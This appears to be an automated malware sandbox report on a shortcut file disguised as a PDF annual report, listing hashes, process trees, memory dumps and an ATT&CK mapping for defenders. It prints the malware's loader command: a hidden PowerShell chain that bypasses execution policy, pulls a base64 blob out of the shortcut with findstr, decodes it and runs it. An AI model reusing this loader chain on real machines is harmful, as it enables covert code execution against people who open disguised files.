ec01c971910cefaf107cd44a7d4c7e68d6e1659ee24c60340c505511d37104b3

General

Target

2023_Annual_Report.pdf.lnk
Size

55KB
MD5

bbc4414d76d1a765f3d525556f616ef9
SHA1

c73e28d87fbbc8be79ed1d421e78a41c29111a86
SHA256

86f504dea07fd952253904c468d83d9014a290e1ff5f2d103059638e07d14b09
SHA512

2a7204e361ace1c5c03bc240b985d09cc1f1e67dce025dca5ac9d450bc7193e456d3602ab557abd9bd7ec4d96815e41df06cdce9359379b32c0e777aa9d54be7
SSDEEP

768:NLoFJQeDHeGYyhA5Z7JsCVResXebqwVCYm7/k/m7RU6d/dwiuGIjsZL2RxcNRyxc:NLBWYX5Z7JsCVCbqECB7cOm0OoxUURV

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3036	powershell.exe
2584	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 2816	2340	cmd.exe	29
PID 2340 wrote to memory of 2816	2340	cmd.exe	29
PID 2340 wrote to memory of 2816	2340	cmd.exe	29
PID 2816 wrote to memory of 2256	2816	cmd.exe	30
PID 2816 wrote to memory of 2256	2816	cmd.exe	30
PID 2816 wrote to memory of 2256	2816	cmd.exe	30
PID 2816 wrote to memory of 3036	2816	cmd.exe	31
PID 2816 wrote to memory of 3036	2816	cmd.exe	31
PID 2816 wrote to memory of 3036	2816	cmd.exe	31
PID 3036 wrote to memory of 2584	3036	powershell.exe	32
PID 3036 wrote to memory of 2584	3036	powershell.exe	32
PID 3036 wrote to memory of 2584	3036	powershell.exe	32

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\2023_Annual_Report.pdf.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /B findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk > "C:\Users\Admin\AppData\Local\Temp\Temp.jpg" & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\Admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\system32\findstr.exe
    findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk
    3⤵
    PID:2256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\Admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Temp.jpg

Filesize
7KB

MD5
50514f94115e319477095fbefa61257e

SHA1
004b3b8e4ace16db6fc954c10decf8856617ef12

SHA256
4339e02a2557b36934baf68b6e97daae04a3e118da2a66915e6200579594d8c6

SHA512
47f6a6f52e02cb7365e70e1637ad0f6e4c96c6f156ad794f3583eb8cbf1dc9af3b8a921ca2c754c2636bba2c2c6991204930502d171b2b41b72af78bfb7e2a49

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e282182c508d95b13bd9cc6fdd0a9ae0

SHA1
103262f3e49cdd4ddc49dcbb9487a7708bb1ca6c

SHA256
87e3b8dac0ebd421f8358a2b5204577e80e96d53fb1335e6d563a6959e811a2e

SHA512
4ec75bec57e782de93eac2c41f1314676ed0b523b2632549867081f7d68f9f5cd36ebb7c8f041e34f8256173d444c8ba9d38283176b362950344366fe05ca8a2

Download Submit
memory/2584-54-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2584-66-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2584-65-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2584-64-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-58-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2584-57-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2584-56-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2584-55-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-53-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/3036-45-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/3036-46-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/3036-39-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

Filesize
2.9MB

Download
memory/3036-44-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/3036-43-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/3036-59-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/3036-60-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/3036-61-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/3036-62-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/3036-63-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/3036-42-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/3036-41-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

Filesize
9.6MB

Download
memory/3036-40-0x0000000002620000-0x0000000002628000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing